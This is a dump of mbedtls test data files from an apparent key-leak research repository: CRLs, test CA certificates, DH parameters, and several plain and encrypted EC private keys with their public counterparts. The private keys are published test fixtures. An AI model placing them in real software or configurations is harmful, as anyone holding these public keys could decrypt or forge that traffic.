/mbedtls-key-leak/mbedtls/tests/data_files/crl_sha1.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAG64jqn7VLdvnKROsbCPR8w9 6 | xnox9vjuM2lGWema9sTuptw9EhArVSbibXZ1IPPyrEy1QOq3NukBqUW3KzOzYV5M 7 | BxZSa28FTQxtVChWkDUIMCK8BSxy07yieFf/3A8mbfcW3ZzN4akLxOweuFp6l2H7 8 | 9oa2jeUi1BlHCZS6JYI2pHZl8qiMRiqqMleSM2k1w7TraKLNBFM8UK72brXeZjPi 9 | nNOzdYsQDzWo1HW7dsLWLfZKoJeyqvofVDQpC5dO56kty/do89z1OnEXfzMNeVVT 10 | JCeAOzuu6kdrf+9keRoWhcIoBos/XtTV57u0pgr81bLgjj5PYivevKL/kKbyvKI= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_sha224.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQ4FADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEOBQADggEBAL2sIly2OwgBu9UfEImduTG/ 6 | RtGEO8RkXbCRJPLZaVGQh9b8rCRVHL9tIWm372FVkKyYEm3mIrl2ry16RznRt5yx 7 | Dd8/DKUGUlIe1KwzjDc9O7bv1FDSXHd1USmGTheKDHNtuJXYENMHdoyR2k2BVGOZ 8 | ie4zUcSpqyMjBlUjgNmXN6gQIcrRImumVUjMk74+rWTa0hQ0piF2qlRuE1dDqcZP 9 | LkE/92rbnFeRAO91XUeEj13dif2UjlArFWd62AFp0wtIn2sb7wahhUj9/rEs6Wgx 10 | kdiNsRMto6/ixLrPu3vxs80ZPWHey587T1ZZ9bS/wDkp9W+W0rGyRoPVmqiKtvM= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_sha256.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQsFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQELBQADggEBAG4mBBgwfNynCYYL2CEnqore 6 | mgKpC32tB6WiUBu9figcvdN3nSX/1wrB8rpiE8R04C8oSFglwhotJCnlWsy42tjb 7 | 0pk0Wuizln0PFMc/OypqRNNhwx31SHH42W4KzONiqvq3n/WkH3M1YniR1ZnMlyvi 8 | lJioQn6ZAoc6O6mMP1J9duKYYhiMAOV992PD1/iqXw+jYN31RwdIS8/mGzIs4ake 9 | EdviwhM3E4/sVbNOWCOnZFYV4m+yNAEe29HL1VKw6UXixBczct+brqXNVD3U6T0F 10 | 5ovR6BTefZO17eT52Duke5RZGDUyQOGywxOYKI5W+FcOYdp+U5Idk399tAz2Mdw= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_sha384.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQwFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEMBQADggEBAC0GpmRvsrvshp1q/SXk80HA 6 | m28ZvEuys9zY5/AnrtYHQfsX9QRJk5li7PlnzHtVGp8I5Qi4mJVPaJ+JmhqAc/oo 7 | NPmxDx8m9XF9v0XHzqQZIWlPXH8QM9WLzTazbQFXhuwnZ6LPhpo+m8cbN91mUFil 8 | 9g+SGkma+VYV+yPRNmKyldcRVvPZUIkhTCMWkZoYrbDXUmkVQpsgz2c5ksIeMI/7 9 | 4Qj9J38I9AOt0DlQ3etFhNc0OMnR7zY8tn9B4dejoNklEZfiyDxsDZVPusZrxnWM 10 | WxuehOGHZf3YESjLMtR7BW26QRHIF/nhGDHsbLiunxXI6eJlbYFoZMfwc6TMqnc= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_sha512.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQ0FADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQENBQADggEBAH6GU24hd6d/5PmDusT+h2Kl 6 | e7scmhkZDPU+VJSnzHdEREYTPaoFqyVBuJOE95lZELEqdOauhO3lG2WEQVGcgEcv 7 | 4jS2EzR3BYex1c1upqGtdIvIoA9TOLukdy6KeauomiWho2Kd7bSaXHy20jwdkLko 8 | /t3lVhTtBvKbh8XHVYwCaw1aCj3LydwNcS+zPnRgsMVHszFxmMNn5HCRW8lbYwcf 9 | UA98OmxIZs2hpBKRpvlfA5y6sXEx2+tSMg+MJrziGBgG6OR/m+KTaK5Yle9nrC+7 10 | hzKIe83hpktvfB1CY5Ak4Uke9/1FRqAjs5KCRxYSGQ7ZdS7DgAeGwT3slLbl/tY= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crt_cat_rsaexp-ec.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjQx 4 | OVoXDTExMDIyMDExMjQxOVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAKgP1XmCIPbfY1/UO+SVFQir 6 | jArZ94QnQdoan4tJ29d8DmTxJ+z9/KyWNoGeOwc9P/2GQQaZahQOBr0f6lYd67Ct 7 | wFVh/Q2zF8FgRcrQV7u/vJM33Q2yEsQkMGlM7rE5lC972vUKWu/NKq8bN9W/tWxZ 8 | SFbvTXpv024aI0IRudpOCALnIy8SFhVb2/52IN2uR6qrFizDexMEdSckgpHuJzGS 9 | IiANhIMn5LdQYJFjPgBzQU12tDdgzcpxtGhT10y4uQre+UbSjw+iVyml3issw59k 10 | OSmkWFb06LamRC215JAMok3YQO5RnxCR8EjqPcJr+7+O9a1O1++yiaitg4bUjEA= 11 | -----END X509 CRL----- 12 | -----BEGIN X509 CRL----- 13 | MIIBcTCB9wIBATAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 14 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 15 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 16 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 17 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 18 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwIDaQAwZgIxAKuQ684s7gyhtxKJr6Ln 19 | S2BQ02f1jjPHrZVdXaZvm3C5tGi2cKkoK1aMiyC3LsRCuAIxAIMhj0TmcuIZr5fX 20 | g5RByD7zUnZBpoEAdgxFy4JPJ2IViWOPekSGh8b/JY1VNS6Zbw== 21 | -----END X509 CRL----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/dhparams.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIGHAoGBAJ419DBEOgmQTzo5qXl5fQcN9TN455wkOL7052HzxxRVMyhYmwQcgJvh 3 | 1sa18fyfR9OiVEMYglOpkqVoGLN7qd5aQNNi5W7/C+VBdHTBJcGZJyyP5B3qcz32 4 | 9mLJKudlVudV0Qxk5qUJaPZ/xupz0NyoVpviuiBOI1gNi8ovSXWzAgEC 5 | -----END DH PARAMETERS----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/dir2/test-ca2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICUjCCAdegAwIBAgIJAMFD4n5iQ8zoMAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xMzA5MjQxNTQ5NDhaFw0yMzA5MjIxNTQ5NDhaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqOBoDCBnTAdBgNVHQ4EFgQUnW0g 9 | JEkBPyvLeLUZvH4kydv7NnwwbgYDVR0jBGcwZYAUnW0gJEkBPyvLeLUZvH4kydv7 10 | NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UE 11 | AxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAwGA1UdEwQFMAMBAf8w 12 | CgYIKoZIzj0EAwIDaQAwZgIxAMO0YnNWKJUAfXgSJtJxexn4ipg+kv4znuR50v56 13 | t4d0PCu412mUC6Nnd7izvtE2MgIxAP1nnJQjZ8BWukszFQDG48wxCCyci9qpdSMv 14 | uCjn8pwUOkABXK8Mss90fzCfCEOtIA== 15 | -----END CERTIFICATE----- 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/dir3/Readme: -------------------------------------------------------------------------------- 1 | This is just to make sure files that don't parse as certs are ignored. 2 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/dir3/test-ca2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICUjCCAdegAwIBAgIJAMFD4n5iQ8zoMAoGCCqGSM49BAMCMD4xCzAJBgNVBAYT 3 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 4 | QyBDQTAeFw0xMzA5MjQxNTQ5NDhaFw0yMzA5MjIxNTQ5NDhaMD4xCzAJBgNVBAYT 5 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBF 6 | QyBDQTB2MBAGByqGSM49AgEGBSuBBAAiA2IABMPaKzRBN1gvh1b+/Im6KUNLTuBu 7 | ww5XUzM5WNRStJGVOQsj318XJGJI/BqVKc4sLYfCiFKAr9ZqqyHduNMcbli4yuiy 8 | aY7zQa0pw7RfdadHb9UZKVVpmlM7ILRmFmAzHqOBoDCBnTAdBgNVHQ4EFgQUnW0g 9 | JEkBPyvLeLUZvH4kydv7NnwwbgYDVR0jBGcwZYAUnW0gJEkBPyvLeLUZvH4kydv7 10 | NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEcMBoGA1UE 11 | AxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAwGA1UdEwQFMAMBAf8w 12 | CgYIKoZIzj0EAwIDaQAwZgIxAMO0YnNWKJUAfXgSJtJxexn4ipg+kv4znuR50v56 13 | t4d0PCu412mUC6Nnd7izvtE2MgIxAP1nnJQjZ8BWukszFQDG48wxCCyci9qpdSMv 14 | uCjn8pwUOkABXK8Mss90fzCfCEOtIA== 15 | -----END CERTIFICATE----- 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_224_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MGgCAQEEHGhJ+X0QZvaZd1ljfH44mUZM7j7HrJcGU6C+B0KgBwYFK4EEACGhPAM6 3 | AAQWk6KQ9/C1cf4rQdXYSwEydjH0qGD5lfozLAl/VBkrsQ8AET8q/7E8GiTORJFF 4 | calUQK4BSgDL9w== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_224_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | ME4wEAYHKoZIzj0CAQYFK4EEACEDOgAEFpOikPfwtXH+K0HV2EsBMnYx9Khg+ZX6 3 | MywJf1QZK7EPABE/Kv+xPBokzkSRRXGpVECuAUoAy/c= 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_256_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MHcCAQEEIEnJqMGMS4hWOMQxzx3xyZQTFgm1gNT9Q6DKsX2y8T7uoAoGCCqGSM49 3 | AwEHoUQDQgAEd3Jlb4FLOZJ51eHxeB+sbwmaPFyhsONTUYNLCLZeC1clkM2vj3aT 4 | YbzzSs/BHl4HToQmvd4Evm5lOUVElhfeRQ== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_256_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEd3Jlb4FLOZJ51eHxeB+sbwmaPFyh 3 | sONTUYNLCLZeC1clkM2vj3aTYbzzSs/BHl4HToQmvd4Evm5lOUVElhfeRQ== 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_384_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGkAgEBBDA/XY2b4oC1aWzFzJ+Uz4r35rYd1lkrKrKzpMYHRQQX7DJ9zcrtfBAF 3 | PXGaBXTwp2qgBwYFK4EEACKhZANiAATZxmK1C6KcpHmQRQ4EOur08MabFWdtES9i 4 | KnHJMFmvmZaRxWgNK0TREVedsS9KQTou1cRfz7Z7W2PgC5Hr5Z0JprGsLAxCgqoS 5 | MX7VkU+Zm8SIuxMug0LMNvLKXjN5x0c= 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_384_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE2cZitQuinKR5kEUOBDrq9PDGmxVnbREv 3 | YipxyTBZr5mWkcVoDStE0RFXnbEvSkE6LtXEX8+2e1tj4AuR6+WdCaaxrCwMQoKq 4 | EjF+1ZFPmZvEiLsTLoNCzDbyyl4zecdH 5 | -----END PUBLIC KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_521_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIHcAgEBBEIBsbatB7t55zINpZhg6ijgVShPYFjyed5mbgbUNdKve9oo2Z+ke33Q 3 | lj4WsAcweO6LijjZZqWC9G0Z/5XfOtloWq6gBwYFK4EEACOhgYkDgYYABAAd4ULV 4 | T2nrA47kt6+dPKB3Nv2c9xnrNU1ph57n88E2+w+/nwj4a+X6Eo7BoFHT5sZD6Fra 5 | j/rPNmPCYL0shEtvVgDO6OSKnmXQnK3YnyNd7gXzuKZGvnFfH2fVtDTg/yOh/Afv 6 | d0AZPkDu/287zf12WqkVUDNST+TyBfVETiksTC9qwQ== 7 | -----END EC PRIVATE KEY----- 8 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_521_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIGbMBAGByqGSM49AgEGBSuBBAAjA4GGAAQAHeFC1U9p6wOO5LevnTygdzb9nPcZ 3 | 6zVNaYee5/PBNvsPv58I+Gvl+hKOwaBR0+bGQ+ha2o/6zzZjwmC9LIRLb1YAzujk 4 | ip5l0Jyt2J8jXe4F87imRr5xXx9n1bQ04P8jofwH73dAGT5A7v9vO839dlqpFVAz 5 | Uk/k8gX1RE4pLEwvasE= 6 | -----END PUBLIC KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_bp256_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MHgCAQEEICFh1vLbdlJvpiwW81aoDwHzL3dnhLNqqZeZqLdmIID/oAsGCSskAwMC 3 | CAEBB6FEA0IABHaMjK5KvKYwbbDtgbDEpiFcN4Bm7G1hbBRuE/HH34CblqtpEcJ9 4 | igIznwkmhA5VI209HvviZp0JDkxMZg+tqR0= 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_bp256_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MFowFAYHKoZIzj0CAQYJKyQDAwIIAQEHA0IABHaMjK5KvKYwbbDtgbDEpiFcN4Bm 3 | 7G1hbBRuE/HH34CblqtpEcJ9igIznwkmhA5VI209HvviZp0JDkxMZg+tqR0= 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_bp384_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIGoAgEBBDA92S51DZDX05/BiFzYrRLqlEHyK5M0tNllICrbFEjOJMWAioXdmvwi 3 | mvCjEk91W8ugCwYJKyQDAwIIAQELoWQDYgAEcZ+dCTpifg01A4XGYc6/AMYZI1Zv 4 | 6QBqMQevHYcbxrtomF/XIuoyvjFvjng7fNGVd4X2bPwMsZXdXJmo56uqhIVTpYTf 5 | 0rSOdtRF/gDdi+WQlth31GltI7S8jbFHJOZq 6 | -----END EC PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_bp384_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MHowFAYHKoZIzj0CAQYJKyQDAwIIAQELA2IABHGfnQk6Yn4NNQOFxmHOvwDGGSNW 3 | b+kAajEHrx2HG8a7aJhf1yLqMr4xb454O3zRlXeF9mz8DLGV3VyZqOerqoSFU6WE 4 | 39K0jnbURf4A3YvlkJbYd9RpbSO0vI2xRyTmag== 5 | -----END PUBLIC KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_bp512_prv.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MIHaAgEBBEA3LJd49p9ybLyj9KJo8WtNYX0QKA15pqApzVGHn+EBKTTf5TlUVTN9 3 | 9pBtx9bS7qTbsgZcAij3Oz7XFkgOfXHSoAsGCSskAwMCCAEBDaGBhQOBggAEOLfs 4 | krYcXGx/vCik7HWdSPzU4uN03v1cSWilTb73UQ5ReIb7/DjqOapSk1nXCnFWw108 5 | usfOd2vbJR3WS85xI0Qk7nBJ7tBy8NvE15mW4XXVV+JjdjrpcJXAgec+fbLjitw9 6 | TJoEh7Ht6HbcH8phyQLpodhyK4YSko8YokhFWRo= 7 | -----END EC PRIVATE KEY----- 8 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_bp512_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIGbMBQGByqGSM49AgEGCSskAwMCCAEBDQOBggAEOLfskrYcXGx/vCik7HWdSPzU 3 | 4uN03v1cSWilTb73UQ5ReIb7/DjqOapSk1nXCnFWw108usfOd2vbJR3WS85xI0Qk 4 | 7nBJ7tBy8NvE15mW4XXVV+JjdjrpcJXAgec+fbLjitw9TJoEh7Ht6HbcH8phyQLp 5 | odhyK4YSko8YokhFWRo= 6 | -----END PUBLIC KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.pk8.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.pk8.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.pk8.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MG8CAQAwEwYHKoZIzj0CAQYIKoZIzj0DAQEEVTBTAgEBBBgzjoaogeI49Um9bwVT 3 | SUtz49YRMP3GyW2hNAMyAARRdbzfMKNw851Tk+YScojYAWe19LS3dsZ098bzVLfS 4 | JAYsH2hUtaevD+V46vJY8Cc= 5 | -----END PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.pk8.pw.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.pk8.pw.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.pk8.pw.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN ENCRYPTED PRIVATE KEY----- 2 | MIGRMBwGCiqGSIb3DQEMAQEwDgQIIrlmCCSpJzcCAggABHGm2LyJ60ojfilRRp8h 3 | Xf+sWL3lJq6wlj4Nk41SHVnZ2RiVtP5NVK908/WxnXkridd6Qpjnq/14woWVmQxT 4 | IzhKFVi22YmQyBsNj+bEGDAE4c9qaby8u6zbzs7Qj29F90f/PiYsaIEGcNn/W88e 5 | XarNDw== 6 | -----END ENCRYPTED PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.sec1.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.sec1.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.sec1.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MF8CAQEEGDOOhqiB4jj1Sb1vBVNJS3Pj1hEw/cbJbaAKBggqhkjOPQMBAaE0AzIA 3 | BFF1vN8wo3DznVOT5hJyiNgBZ7X0tLd2xnT3xvNUt9IkBiwfaFS1p68P5Xjq8ljw 4 | Jw== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.sec1.pw.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: DES-CBC,AA94892A169FA426 4 | 5 | gSkFuUENNke5MvkWHc11/w1NQWBxaIxGT+d5oRcqs44D3tltVOwtdnYexoD9uSIL 6 | wMFFRLL6I5ii1Naa38nPOMaa7kLU2J3jY8SeIH1rQ43X6tlpv9WFGqDn/m6X7oKo 7 | RMMfGdicPZg= 8 | -----END EC PRIVATE KEY----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.specdom.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/ec_prv.specdom.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_pub.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/ec_pub.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/ec_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MEkwEwYHKoZIzj0CAQYIKoZIzj0DAQEDMgAEvHl9s65/COw9SWtPtBGz9iClWKUB 3 | 4CItCM/g3Irsixp78kvpKVHMW6G+uyR0kJrg 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/enco-ca-prstr.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICDTCCAXagAwIBAgIETZt8lzANBgkqhkiG9w0BAQUFADBCMUAwPgYDVQQDEzdP 3 | cGVuVlBOIFdlYiBDQSAyMDExLjA0LjA1IDIwOjMzOjI3IFVUQyBhc2RlbW8ueW9u 4 | YW4ubmV0MB4XDTExMDMyOTIwMzMyN1oXDTIxMDQwMjIwMzMyN1owQjFAMD4GA1UE 5 | AxM3T3BlblZQTiBXZWIgQ0EgMjAxMS4wNC4wNSAyMDozMzoyNyBVVEMgYXNkZW1v 6 | LnlvbmFuLm5ldDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA38U3wA/eTGN/ 7 | /AJHo2OsEHjLdO9k3Mo5QcShvg+6IoAThD7HEyOYm4Ild8s4+eEy2i9ecWvMKG6M 8 | YSO+GwG9xOd9wDFtODpF+z6rIt8a4bLbQHcsp9Ccu+ZmjxkJkmxOCz774lxETArX 9 | SaksAB5P6Web/LwKUv/Iy9crRM9HzSECAwEAAaMQMA4wDAYDVR0TBAUwAwEB/zAN 10 | BgkqhkiG9w0BAQUFAAOBgQARCDFYCb9n151hgwitxzbuacIVDqIH8EouV2VBqlNR 11 | tj8q1maliDE3pW7WRAwMi5i3+5c0auKwhTGESsBPjasd5QnjqXOkRbcZhkeVQ1ln 12 | 6NEn6xC+M+H2LGVHSSropcGa8olLlo98LrsFuHVHMewTs7SK2lc+7rU/ILec3ymj 13 | og== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/enco-cert-utf8str.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB8jCCAVugAwIBAgIETZt8+zANBgkqhkiG9w0BAQUFADBCMUAwPgYDVQQDDDdP 3 | cGVuVlBOIFdlYiBDQSAyMDExLjA0LjA1IDIwOjMzOjI3IFVUQyBhc2RlbW8ueW9u 4 | YW4ubmV0MB4XDTE0MDcyOTAzNTMzM1oXDTI0MDgwMjAzNTMzM1owFzEVMBMGA1UE 5 | AwwMZHcueW9uYW4ubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDHYW8q 6 | ZZ/HIIlU8j/YIyTh3h59JcJF0Es7RsPg25QVJkDkfhMn6l15f2neB2KPLKxCLpLD 7 | ozYD4s/If8aq74A1C2vvOLo/Gq1erNS4b9IS5xLs3Lu643XGxS93Rf6jrsGa8lfb 8 | Wa7DsQrp7FLT5GApwCp6CebmZq7jEImj0pDFRwIDAQABoyAwHjAJBgNVHRMEAjAA 9 | MBEGCWCGSAGG+EIBAQQEAwIGQDANBgkqhkiG9w0BAQUFAAOBgQAS1Ulo7iBABpm/ 10 | S23mCnIFRY1+eFfYg4h8EiK9f8kWDwduXSYGVUqRHqh4LcNSdTOIaSEG4RGyV/EA 11 | 5RfTviaQ9PxPiSFegNja8/aHel/nORfsEk4rwBCPGKDveL5KYhAtyAs865ZzLtv+ 12 | kEkfhaTgrBIikwlnquoX5UHOdL/iaw== 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- 